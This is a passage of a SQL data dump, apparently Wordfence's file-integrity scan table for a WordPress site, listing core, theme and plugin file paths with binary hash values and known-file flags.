i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('��>����1�G��','wp-content/themes/event/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�/�ќF�����%%','�w��_���d��{�	�$�Mt�,��t%��j}','',0,'?'),('�hädX��\nB�\"$','wp-content/themes/the-best/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȓ��<]M��	���','��/0W*�Ij2�� �%����)r*�f\\�','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('6��xi9Z�`Q\n#','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/haml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wt\'�A�w���','�I)��\\A���Q��q��Ed�o�>��M��','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('�����F{�v6��','wp-content/themes/wp-simple/inc/pro/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�c쟘3yRd.Q\"','/�� ���YJ�������㪼a�9mz�','',0,'?'),('&و\\�ߣ�`�*?,','wp-content/themes/Endolf/content-none.php',0,'a�ںyK���hX&#�z','a�ںyK���hX&#�z','z�����L�(��L�%e2Z2Ql�F7WM�','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R	��p<#~%7','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('>����c�����ć[','wp-content/themes/skt-pathway/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�*]�Q�;l�ݫ=��','>Vo�>o�):N�{x���CǶ��3��\r','',0,'?'),('L$����r:3�X��','wp-content/themes/advance/js/unminified/jquery.smooth-scroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l]N>��#�ԅ�(n��d','��+�qۀʣ�+�����gw�$�nC��ck�q','',0,'?'),('[� �\\\Z��1Q)B�','wp-content/themes/graphene/includes/theme-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���MdG�6OZ�X�NR','#�ِ��9��e�Is/�j]:Io����);�S','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��c��7пm�]�','wp-content/themes/gambit/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ek����K�m��7\Z�','�d���gC��^k�`|unI�_��Z)��o','',0,'?'),('�\0`���z���9��','wp-content/themes/skt-pathway/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'(1�*�����','|4�(��E�3}���֟\n�\\L�S-�UR�ё0','',0,'?'),('��4���2V��2,���','wp-content/themes/gambit/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�i�bZ�!4ݨZ�','5DZ9�j/��j���X�e��uKb<�','',0,'?'),('�Q����*V��','wp-content/themes/chronus/inc/customizer/controls/category-dropdown-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hk�Ld��|����','�Ζ�2�E��#�n�m�K򕕞�>���£t�','',0,'?'),('��pCy�)�	�{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r	������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('��h�]J2�Σ�','wp-content/themes/enigma/css/font-awesome-4.7.0/less/rotated-flipped.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gl�P�d����j��%','�S�՟�Ʃd���3&�^�ߥx���?�l��p�','',0,'?'),('˱:(���&3*Ǧ�','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������þ�ڱ\nN��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('��jz�|yCw>D�','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-alpha-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��-*!�\r$�����','@?�Q0{�0������M<���$�i��','',0,'?'),('�Ec:9���j����o','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\'���1�+�4��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('������\\PPR�N�','wp-content/themes/hemingway/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a9��Y$0�6YL','�Wj��b�>P8_풕����W.o��2l9!��','',0,'?'),('��xJ7��dUͨ=Ϫ','wp-content/themes/chronus/inc/customizer/controls/magazine-widget-area-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ə>�\r�ј�T����z','��f��3�1��vwM���R^f|��u�Ϛ�Z�','',0,'?'),('���\"�Zf9RW�r���','wp-content/themes/graphene/includes/theme-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�Q\"z��t���','N>�K��5�a�=�_�\\T4�Mϯ�S5��ǟY','',0,'?'),('D�����i����','wp-content/themes/enigma/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��\04q��<�^��j','�5]`�/�զ�	B=�<�s�͝�@{Y��U�Z','',0,'?'),('�E���t�(�e�','wp-content/themes/the-best/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k֌>�ȴ�p�=�{ig',')�<0(]o�7Z�k��E�j�w�+�&ʰA���','',0,'?'),('!\"�cd��^�2��','wp-content/themes/education-hub/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\n$ X�d�̉�$','�b��.ђ���Na��/��G��LG]�c�m�\nA�','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('$}�O��ri� �','wp-content/themes/graduate/assets/uploads/404-300.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Mj���A�Ԇ7�h�','��]�v�������\Z����FM���','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),('.��S����Irv��.','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/functions/validate-css-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|=do$/r�b˖�s','�}� E��gv<�3HI.Qaq�������zU','',0,'?'),('8����r �X\06���','wp-content/themes/chronus/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W����>E�����6|��','��.OY/���ϼ���\\�G�!ٌ����ҿ','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('D?䱫7��p�x����','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i8ɬ��ϋcB��N','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),('_6�}��b!0\'�m��','wp-content/themes/quicksand/css/quicksand.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dl(��4�xE鿨:','wHɾqbA��Ň��\'T�b\"gH{Pt�s��','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('j�L� �.%�~��\0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/<8uA��P','����ٚ�W��ct�GR�/�*]��z��3','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1O��2e1����rJ�j','#T�c��x�E��ƒy�ũ��H���>��','',0,'?'),('�g�Ʀ��L<�,�','wp-content/themes/city-store/inc/customizer/functions/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?<�e�{�u��g�OR','`�9\r�n׬)2�Gİ�OX�H����]\n','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('�@���V2���3��','wp-content/themes/education-hub/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E;�8��6������','lhC;=ž2���B�eU�߶���?zo��\'3�)','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('�)��6^DK�7F�M','wp-content/themes/skt-pathway/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vT�6xC�T5�`bDǐ','����e�V�af�V�K�F�	j��r��(ػ	V','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('��r���e�GƆ`~','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�z��v5Pp�\'��v�','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����3p����ǵ�P','A�j�Ⱦf�F���F�]��0=�޹�|���','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A؂Gd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('��6Ԗ�v`g�vO\\�','wp-content/themes/graduate/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zu�6ig	�lm/pi	','N�D{�Cv)�6S���˟/N��Ft���','',0,'?'),('���b#�!�Cu�ŧ[','wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�O`�<9����Ŝ','�d�Oӛ�MCJ��п��3�\\5��)�\Z','',0,'?'),('�%�lB�rl��pa�','wp-content/themes/graphene/images/social/socialvibe.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���~���\n\n[�','����AU+i���0��R��`/�h��;�v','',0,'?'),('�fQ���g��� ','wp-content/themes/quicksand/inc/class.QuicksandCustomizeControlCheckboxMultiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4:�AÍ��W\Z��','1�;U����M�nk�&$���ɱ	�ceȧ�<�е','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('0r�s��օ�A�CO�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/selection/selection-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9N�ǒ�T�G=r�qV�','�9�D��+�db�\n��8\ZS�-O�Q>v���','',0,'?'),('6w���.�^��}�A�','wp-content/themes/education-hub/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7)�bBj��@�','�+PN��b#9�Dg�i\'܍P�,E��\Z�12j�	','',0,'?'),('U�P���0��=Y�','wp-content/themes/catch-flames/images/select-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B����h�rM�z�q','˭��o��F����3E;�k�k����a�','',0,'?'),('V[BH�Ñ�\r�j�~�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/zenburn.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�VyD��\0��.�','(?w7���`~yqĬ�v)zz�T�ғ�Y��Wt','',0,'?'),('b��Os�u���','wp-content/themes/graduate/inc/customizer/sections/client-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��y=M��)�u?�','	�bb*1�g�x�\0В���ˏ\\���h�FKe9','',0,'?'),('n�̇�PV�+*5Jk�o','wp-content/themes/singularity/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�����T�s\n��*�','���n\\���mȮ8��.]��^����\'','',0,'?'),('qB�,��/�)S푊','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[���\nSO2}','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('wQ��#S����L<ն�','wp-content/themes/quicksand/inc/customize-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�ح��!�d �\ZL��','�?@qV�P�l�4���M�ա`�ʵ@���=x�','',0,'?'),('yb��(H��ZHLP�','wp-content/themes/education-hub/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�������k<��','�Fɷ��2�rEfv~/yI�)���p�^J�\\�','',0,'?'),('��kEMdpUb�*��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/epsilon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1D((h^���~*�D�','�\Z�[/�_j\n��	y��ΝvA}�DX3��?lE','',0,'?'),('��z�&�TD\Z\\�','wp-content/themes/lovecraft/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�x���G\Z\Z/\Z�-','Ԍ�[��WQ2���7�e\'֔��萪��ۢ{S��','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:,�\'��:l�e����','h�B	Z����tUxW(b�\"�S���+��6\0X@�','',0,'?'),('��D3�*4�����S��','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/buttons/icons/tick.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɵ(�Tyg�/y��','�D���<q7پ �^��E_{G6���_\Z�b�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('�Hyϳ_r��w&','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\ZB�\"4�]C\Zh1','8Fb��lv�l�E�]�e�����O���\Z��','',0,'?'),('���Xq��Kj:�3','wp-content/themes/university-hub/js/custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�ۓ�4�|G���ޯf','+��u�>%�P������d��?2���m� ?��','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('1շ᱀�ZL���','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php',0,'�y	��,$l֌pG��','�y	��,$l֌pG��','��HK��6�H�7C����\Z�ZS��e���k�o','',0,'?'),('3�]a_�b�\'�','wp-content/themes/metro-magazine/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W2B�c:I��\r7k','�,�.IA���L��/7�O*KB��cWZ�oDA','',0,'?'),('H׌Jl�\n��k\n','wp-content/themes/simpleshift/inc/kirki/assets/scss/sections/hover.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�ܞ\\\nowX�D2','��X��\\?!eeO���q�z��ėJD�$O0','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;�wBwH��3Vo!��','�0��ͩf#���?����:�\0\\O����e�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�m	��ἦ���e','���$��_X��oZ\'�&�\n5��5ԧv','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������\n|=�}','�ӄ=�gHt]{كL�]�_^�.ˌ��i','',0,'?'),('s�f	!B�G��c9�Ay','wp-content/themes/graphene/images/social/xing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4~��˨;���4E','c��n��-�U���NySR䳟)����h��','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('��y2�7�yѦuȒ','wp-content/themes/graduate/inc/customizer/theme-options/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�~�:�¦f�?\n6','��=2%[)H4��A�i>�$q�l����G�O��','',0,'?'),('��.�����ʦ̥0�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�u\r�\"�','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('����}\'�H$�:','wp-content/themes/wp-simple/assets/images/preview/262x262-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��v�nH�6','1���\ZE�&�ؤg�W�/A���ZH���KU','',0,'?'),('��K:>#�$�r�','wp-content/themes/graphene/images/sprite_v.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�g�����\0� ���','�yk���.n�3�>�D�2bp��S�ӗ:�','',0,'?'),('��	{g���顅�[','wp-content/themes/Yegor/footer.php',0,'}*���I��F�C��ۮ','}*���I��F�C��ۮ','�W=�������q�%b�75՘2���{','',0,'?'),('�$�%4v�ǟ�݋H�p','wp-content/themes/advance/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','啌�)��\r�u<w��e','��b3��E���u��tgS��7]�	~1U�3�','',0,'?'),('��B�hݖEu*��','wp-content/themes/metro-magazine/inc/wp-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8� ��ש�b��&Jf�','R\"��;:}�%3|	�)��A˕E����X�f','',0,'?'),('���׻*%���mS','wp-content/themes/university-hub/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`E��$I#@\nJ���H�','�*W�E<m�{�\r�ƫ~����nx�','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('��+��&<F~;��','wp-content/themes/chronus/inc/customizer/controls/upgrade-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3=P�%�K��F���','T��|c��8;�c>y��y�3���)[	%�r�-','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('\Z�_�S���4�3','wp-content/themes/lovecraft/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�q\no�x�H�M!��K','��T�|3���P�_e�͸�g\"�$���*2l�','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('֫��z�3=��^�_','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\"|H4+-|��B�:','�C���uUpѾ�-�G����H�\Zj툑�ϊ�{','',0,'?'),('0i,M8��_�� �','wp-content/themes/hitmag/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X)(�bh���������','�!����U4����L�,౜r�֭�cgl','',0,'?'),('F��F�+�\r���8Q�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/gss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n/:}�a\'��n.h\0\\','z�˫��M~��>Ԇ�87\"�,���c\"M�1�','',0,'?'),('Ty�#�iq-Nk��ww�','wp-content/themes/skt-pathway/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kP�k lf�`�F','xe���z�:��\Z��{�@xnj�~Q&#f�','',0,'?'),('d���l)�bcf�=V�~','wp-content/themes/newsmag/assets/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�C���-�?�	�:\n','�M�ӷ0�ZD�$�\ZU�3c�O�g�W��\' uH�','',0,'?'),('g�mJ4���C8�5g\Z�','wp-content/themes/enigma/post-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ai���i��NB��','�m�������m|�SG�m,��;��RM1','',0,'?'),('i��\"=���q','wp-content/themes/wp-simple/inc/kirki/includes/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�8\\@s����','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F